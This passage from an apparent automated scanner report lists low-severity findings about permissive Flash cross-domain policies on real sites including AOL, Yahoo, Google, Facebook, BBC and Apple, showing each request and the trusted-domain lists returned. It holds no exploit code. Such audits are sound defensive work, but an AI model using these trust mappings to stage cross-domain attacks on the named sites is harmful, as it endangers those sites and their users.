The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: about.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:42:11 GMT
Server: AOLserver/4.0.10
MIME-Version: 1.0
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 1511
set-cookie: dcisid=3360738748.923646797.1404767232; path=/
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.digitalcity.com" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="cdn-startpage.aol.com" />
<allow-access-from domain="startpage.aol.com" />
<allow-access-from domain="*.channels.aol.com" />
<allow-access-from domain="*.channel.aol.com" />
<allow-access-from domain="*.web.aol.com" />
<allow-access-from domain="*.my.aol.com" />
<allow-access-from domain="*.news.aol.com" />
<allow-access-from domain="iamalpha.com" />
<allow-access-from domain="imakealpha.com" />
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " />
<allow-access-from domain="*.spinner.com" />
<allow-access-from domain="*.popeater.com" />
<allow-access-from domain="*.theboombox.com" />
<allow-access-from domain="*.opticalcortex.com" />
<allow-access-from domain="static.stats.com" />
<allow-access-from domain="*.moviefone.com" />
<allow-access-from domain="*.aolhealth.com" />
<allow-access-from domain="*.walletpop.com" />
<allow-access-from domain="*.stats.com" />
<allow-access-from domain="*.lightningcast.com" />
<allow-access-from domain="*.yourminis.com" />
<allow-access-from domain="*.fanhouse.com" />
<allow-access-from domain="*platformaprojects.com" />
...[SNIP]...

6.72. http://ad.wsod.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.wsod.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 05 May 2011 00:58:51 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Tue, 16 Feb 2010 21:38:42 GMT
ETag: "906968-20a-47fbe8ebb5c80"
Accept-Ranges: bytes
Content-Length: 522
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="
...[SNIP]...
<allow-access-from domain="*.wsod.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wallst.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wsodqa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msads.net" secure="false" />
...[SNIP]...

6.73. http://add.my.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://add.my.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: add.my.yahoo.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:52:13 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

6.74. http://ads.tw.adsonar.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.tw.adsonar.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:46 GMT
Server: Apache
Last-Modified: Tue, 07 Apr 2009 17:58:21 GMT
ETag: "a3d-466fac2afc940"
Accept-Ranges: bytes
Content-Length: 2621
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300, max=428
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="assets.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quigo.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lonelyplanet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mochila.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.conxise.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.web.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.my.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.news.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="imakealpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " secure="false" />
...[SNIP]...
<allow-access-from domain="*.spinner.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.popeater.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.theboombox.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.opticalcortex.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yourminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.liveminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" to-ports="*" secure="false" />
...[SNIP]...

6.75. https://adwords.google.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adwords.google.com

Response

HTTP/1.0 200 OK
P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Thu, 05 May 2011 01:34:27 GMT
Expires: Fri, 06 May 2011 01:34:27 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 33470
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.76. http://aol.sportingnews.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://aol.sportingnews.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: aol.sportingnews.com

Response

HTTP/1.0 200 OK
Server: nginx
Content-Type: text/xml
Content-Length: 540
Last-Modified: Tue, 21 Sep 2010 17:41:28 GMT
Accept-Ranges: bytes
Date: Thu, 05 May 2011 00:57:18 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.sportingnews.com" />
<allow-access-from domain="*.snimg.com" />
<allow-access-from domain="*.sn.internal" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.avatarlabs.com" />
<allow-access-from domain="*.doubleclick.com" />
<allow-access-from domain="*.dartmotif.com" />
...[SNIP]...

6.77. http://aol.worldwinner.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://aol.worldwinner.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: aol.worldwinner.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:52:19 GMT
Server: Apache
Last-Modified: Mon, 20 Oct 2003 15:12:42 GMT
Accept-Ranges: bytes
Content-Length: 388
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DSP COR NID TAIi OUR NOR CNT", CP="NOI DSP COR NID TAIi OUR NOR CNT"
Content-Type: text/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<!--
allows flash player 7 to post within worldwinner [flash solitaire:
...[SNIP]...
<allow-access-from domain='*.worldwinner.com' />
...[SNIP]...

6.78. http://api.local.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.local.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.local.yahoo.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:52:31 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 09 Feb 2010 08:33:00 GMT
Accept-Ranges: bytes
Content-Length: 272
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.yahoo.com" />
...[SNIP]...

6.79. http://ar-ar.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ar-ar.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ar-ar.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.52.222.33
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

6.80. http://ax.itunes.apple.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ax.itunes.apple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ax.itunes.apple.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 13 Apr 2011 15:19:07 GMT
ETag: "1b0-4a0ce546d50c0"
Accept-Ranges: bytes
Content-Length: 432
Content-Type: text/xml
Cache-Control: public, no-transform, max-age=2135
Date: Thu, 05 May 2011 10:52:36 GMT
Connection: close
X-Apple-Partner: origin.0

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*.apple.com" />
<allow-access-from domain="*.apple.com.edgesuite.net" />
<allow-access-from domain="nikeplus.nike.com"/>
<allow-access-from domain="nikerunning.nike.com"/>
...[SNIP]...

6.81. http://developers.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://developers.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: developers.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.36.223.209
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

6.82. http://disqus.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://disqus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: disqus.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:17 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Connection: close
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.usopen.org" to-ports="80,96" secure="false" />
...[SNIP]...

6.83. http://fantasysource.sportingnews.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fantasysource.sportingnews.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: fantasysource.sportingnews.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 10:53:00 GMT
Content-Type: text/xml
Content-Length: 540
Last-Modified: Tue, 21 Sep 2010 17:41:28 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.sportingnews.com" />
<allow-access-from domain="*.snimg.com" />
<allow-access-from domain="*.sn.internal" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.avatarlabs.com" />
<allow-access-from domain="*.doubleclick.com" />
<allow-access-from domain="*.dartmotif.com" />
...[SNIP]...

6.84. http://feeds.bbci.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Server: Apache
Content-Type: text/xml
Cache-Control: max-age=53
Expires: Thu, 05 May 2011 12:38:37 GMT
Date: Thu, 05 May 2011 12:37:44 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

6.85. http://googleads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Wed, 04 May 2011 15:54:51 GMT
Expires: Thu, 05 May 2011 15:54:51 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 68294

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.86. http://images.apple.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://images.apple.com
Path:   /crossdomain.xml

Issue detail

